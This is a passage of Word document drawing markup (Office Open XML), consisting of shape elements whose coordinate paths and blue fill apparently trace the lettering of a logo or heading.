                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="11575" name="Shape 11575"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3045868" y="307701"/>
                            <a:ext cx="19964" cy="90551"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="19964" h="90551">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="98" name="Shape 98"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3693263" y="332657"/>
                            <a:ext cx="77559" cy="92215"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="77559" h="92215">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21234" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39281" y="46571"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56896" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="77559" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50927" y="63119"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="46177" y="74549"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="44424" y="78384"/>
                                  <a:pt x="42748" y="81305"/>
                                  <a:pt x="41161" y="83324"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="39573" y="85344"/>
                                  <a:pt x="37757" y="86982"/>
                                  <a:pt x="35699" y="88226"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="33630" y="89484"/>
                                  <a:pt x="31102" y="90462"/>
                                  <a:pt x="28092" y="91160"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25082" y="91871"/>
                                  <a:pt x="21692" y="92215"/>
                                  <a:pt x="17907" y="92215"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14072" y="92215"/>
                                  <a:pt x="10299" y="91871"/>
                                  <a:pt x="6604" y="91160"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="4826" y="77571"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="7963" y="78117"/>
                                  <a:pt x="10769" y="78384"/>
                                  <a:pt x="13284" y="78384"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="17920" y="78384"/>
                                  <a:pt x="21361" y="77190"/>
                                  <a:pt x="23584" y="74828"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25806" y="72466"/>
                                  <a:pt x="27508" y="69443"/>
                                  <a:pt x="28702" y="65786"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="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99" name="Shape 99"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3417292" y="332657"/>
                            <a:ext cx="68618" cy="67081"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="68618" h="67081">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="30137"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="19964" y="39370"/>
                                  <a:pt x="20333" y="45021"/>
                                  <a:pt x="21070" y="47091"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21806" y="49175"/>
                                  <a:pt x="23139" y="50826"/>
                                  <a:pt x="25083" y="52044"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="27026" y="53251"/>
                                  <a:pt x="29477" y="53860"/>
                                  <a:pt x="32461" y="53860"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="35878" y="53860"/>
                                  <a:pt x="38926" y="53047"/>
                                  <a:pt x="41630" y="51422"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="44323" y="49796"/>
                                  <a:pt x="46177" y="47777"/>
                                  <a:pt x="47168" y="45364"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="48159" y="42964"/>
                                  <a:pt x="48666" y="37058"/>
                                  <a:pt x="48666" y="27674"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="48666" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="68618" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="68618" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50076" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50076" y="55778"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="47333" y="59271"/>
                                  <a:pt x="43726" y="62039"/>
                                  <a:pt x="39243" y="64046"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34773" y="66065"/>
                                  <a:pt x="30048" y="67081"/>
                                  <a:pt x="25083" y="67081"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20015" y="67081"/>
                                  <a:pt x="15468" y="66116"/>
                                  <a:pt x="11443" y="64173"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7417" y="62242"/>
                                  <a:pt x="4509" y="59524"/>
                                  <a:pt x="2705" y="56019"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="902" y="52527"/>
                                  <a:pt x="0" y="47688"/>
                                  <a:pt x="0" y="41504"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="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00" name="Shape 100"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3506789" y="331171"/>
                            <a:ext cx="48869" cy="67081"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="48869" h="67081">
                                <a:moveTo>
                                  <a:pt x="35725" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="40271" y="0"/>
                                  <a:pt x="44653" y="1092"/>
                                  <a:pt x="48869" y="3277"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="42684" y="18414"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="39319" y="16522"/>
                                  <a:pt x="36195" y="15570"/>
                                  <a:pt x="33312" y="15570"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="30518" y="15570"/>
                                  <a:pt x="28156" y="16243"/>
                                  <a:pt x="26212" y="17576"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24269" y="18910"/>
                                  <a:pt x="22746" y="21336"/>
                                  <a:pt x="21628" y="24841"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20510" y="28333"/>
                                  <a:pt x="19951" y="35661"/>
                                  <a:pt x="19951" y="46825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19951" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18542" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18542" y="10820"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="21704" y="6414"/>
                                  <a:pt x="24561" y="3505"/>
                                  <a:pt x="27101" y="2108"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="29629" y="711"/>
                                  <a:pt x="32512" y="0"/>
                                  <a:pt x="35725" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="101" name="Shape 101"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3286698" y="331171"/>
                            <a:ext cx="110947" cy="67081"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="110947" h="67081">
                                <a:moveTo>
                                  <a:pt x="41897" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="46736" y="0"/>
                                  <a:pt x="50927" y="876"/>
                                  <a:pt x="54470" y="2603"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="58026" y="4331"/>
                                  <a:pt x="60934" y="6947"/>
                                  <a:pt x="63208" y="10439"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="66522" y="6947"/>
                                  <a:pt x="70104" y="4331"/>
                                  <a:pt x="73939" y="2603"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="77775" y="876"/>
                                  <a:pt x="81864" y="0"/>
                                  <a:pt x="86220" y="0"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="91757" y="0"/>
                                  <a:pt x="96457" y="977"/>
                                  <a:pt x="100292" y="2933"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="104127" y="4890"/>
                                  <a:pt x="106985" y="7772"/>
                                  <a:pt x="108877" y="11557"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="110249" y="14351"/>
                                  <a:pt x="110947" y="18885"/>
                                  <a:pt x="110947" y="25146"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="110947" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90983" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90983" y="29590"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="90983" y="23089"/>
                                  <a:pt x="90297" y="18885"/>
                                  <a:pt x="88926" y="16993"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="87071" y="14515"/>
                                  <a:pt x="84239" y="13284"/>
                                  <a:pt x="80404" y="13284"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="77610" y="13284"/>
                                  <a:pt x="74981" y="14021"/>
                                  <a:pt x="72517" y="15506"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="70053" y="16993"/>
                                  <a:pt x="68275" y="19164"/>
                                  <a:pt x="67183" y="22022"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="66104" y="24892"/>
                                  <a:pt x="65557" y="29401"/>
                                  <a:pt x="65557" y="35585"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="65557" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="45593" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="45593" y="31140"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="45593" y="24752"/>
                                  <a:pt x="45238" y="20638"/>
                                  <a:pt x="44526" y="18783"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43815" y="16929"/>
                                  <a:pt x="42723" y="15545"/>
                                  <a:pt x="41224" y="14643"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="39738" y="13741"/>
                                  <a:pt x="37706" y="13284"/>
                                  <a:pt x="35154" y="13284"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32080" y="13284"/>
                                  <a:pt x="29311" y="14008"/>
                                  <a:pt x="26848" y="15443"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24384" y="16890"/>
                                  <a:pt x="22619" y="18974"/>
                                  <a:pt x="21552" y="21679"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20485" y="24397"/>
                                  <a:pt x="19951" y="28905"/>
                                  <a:pt x="19951" y="35216"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19951" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18390" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18390" y="10439"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="24968" y="3480"/>
                                  <a:pt x="32804" y="0"/>
                                  <a:pt x="41897" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="102" name="Shape 102"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3235574" y="331171"/>
                            <a:ext cx="37395" cy="67118"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="37395" h="67118">
                                <a:moveTo>
                                  <a:pt x="1315" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="10217" y="0"/>
                                  <a:pt x="16847" y="927"/>
                                  <a:pt x="21203" y="2756"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25559" y="4584"/>
                                  <a:pt x="28620" y="6908"/>
                                  <a:pt x="30397" y="9728"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32176" y="12560"/>
                                  <a:pt x="33065" y="17729"/>
                                  <a:pt x="33065" y="25273"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="32848" y="45529"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="32848" y="51295"/>
                                  <a:pt x="33166" y="55537"/>
                                  <a:pt x="33814" y="58280"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34449" y="61023"/>
                                  <a:pt x="35643" y="63957"/>
                                  <a:pt x="37395" y="67081"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="17647" y="67081"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="17126" y="65925"/>
                                  <a:pt x="16491" y="64224"/>
                                  <a:pt x="15729" y="61950"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15399" y="60922"/>
                                  <a:pt x="15170" y="60249"/>
                                  <a:pt x="15018" y="59919"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11614" y="62801"/>
                                  <a:pt x="7969" y="64960"/>
                                  <a:pt x="4083" y="66408"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="67118"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="55624"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7919" y="53251"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="10332" y="51676"/>
                                  <a:pt x="11919" y="49771"/>
                                  <a:pt x="12681" y="47498"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="13202" y="46024"/>
                                  <a:pt x="13456" y="43205"/>
                                  <a:pt x="13456" y="39039"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="13456" y="35585"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="10903" y="36322"/>
                                  <a:pt x="6852" y="37211"/>
                                  <a:pt x="1315" y="38240"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="38605"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27236"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13456" y="24282"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13456" y="22555"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="13456" y="19215"/>
                                  <a:pt x="12516" y="16840"/>
                                  <a:pt x="10623" y="15418"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="13306"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="271"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1315"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03" name="Shape 103"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3555785" y="309492"/>
                            <a:ext cx="44463" cy="90246"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="44463" h="90246">
                                <a:moveTo>
                                  <a:pt x="29197" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="29197" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42837" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42837" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29197" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29197" y="63436"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="29197" y="68796"/>
                                  <a:pt x="29325" y="71907"/>
                                  <a:pt x="29591" y="72796"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="29845" y="73685"/>
                                  <a:pt x="30442" y="74409"/>
                                  <a:pt x="31356" y="74981"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32283" y="75565"/>
                                  <a:pt x="33414" y="75857"/>
                                  <a:pt x="34734" y="75857"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36589" y="75857"/>
                                  <a:pt x="39256" y="75299"/>
                                  <a:pt x="42761" y="74181"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="44463" y="87643"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="39827" y="89383"/>
                                  <a:pt x="34569" y="90246"/>
                                  <a:pt x="28702" y="90246"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25095" y="90246"/>
                                  <a:pt x="21857" y="89713"/>
                                  <a:pt x="18974" y="88671"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16078" y="87618"/>
                                  <a:pt x="13957" y="86258"/>
                                  <a:pt x="12611" y="84595"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11265" y="82918"/>
                                  <a:pt x="10325" y="80671"/>
                                  <a:pt x="9804" y="77826"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9385" y="75806"/>
                                  <a:pt x="9169" y="71730"/>
                                  <a:pt x="9169" y="65596"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9169" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9169" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9169" y="10135"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29197"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04" name="Shape 104"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3612720" y="307701"/>
                            <a:ext cx="68695" cy="90551"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="68695" h="90551">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="33300"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="26403" y="26746"/>
                                  <a:pt x="34099" y="23470"/>
                                  <a:pt x="43053" y="23470"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="47638" y="23470"/>
                                  <a:pt x="51791" y="24219"/>
                                  <a:pt x="55474" y="25705"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="59170" y="27178"/>
                                  <a:pt x="61951" y="29070"/>
                                  <a:pt x="63830" y="31382"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="65697" y="33693"/>
                                  <a:pt x="66967" y="36246"/>
                                  <a:pt x="67666" y="39039"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="68351" y="41834"/>
                                  <a:pt x="68695" y="46190"/>
                                  <a:pt x="68695" y="52070"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="68695" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48730" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48730" y="55905"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="48730" y="49022"/>
                                  <a:pt x="48349" y="44665"/>
                                  <a:pt x="47600" y="42811"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46838" y="40957"/>
                                  <a:pt x="45504" y="39484"/>
                                  <a:pt x="43586" y="38392"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="41669" y="37300"/>
                                  <a:pt x="39256" y="36754"/>
                                  <a:pt x="36373" y="36754"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="33058" y="36754"/>
                                  <a:pt x="30099" y="37452"/>
                                  <a:pt x="27496" y="38850"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24892" y="40259"/>
                                  <a:pt x="22987" y="42367"/>
                                  <a:pt x="21780" y="45186"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20574" y="48006"/>
                                  <a:pt x="19964" y="52172"/>
                                  <a:pt x="19964" y="57696"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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1576" name="Shape 11576"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3813912" y="358971"/>
                            <a:ext cx="80899" cy="12967"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="80899" h="12967">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="80899" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="80899" y="12967"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="12967"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="11577" name="Shape 11577"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4036464" y="380891"/>
                            <a:ext cx="19964" cy="17361"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="19964" h="17361">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="17361"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="17361"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="107" name="Shape 107"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4153126" y="358407"/>
                            <a:ext cx="33426" cy="41332"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="33426" h="41332">
                                <a:moveTo>
                                  <a:pt x="33426" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="33426" y="11368"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23876" y="14026"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="21272" y="15639"/>
                                  <a:pt x="19964" y="17672"/>
                                  <a:pt x="19964" y="20148"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="19964" y="22574"/>
                                  <a:pt x="21006" y="24669"/>
                                  <a:pt x="23089" y="26447"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25171" y="28212"/>
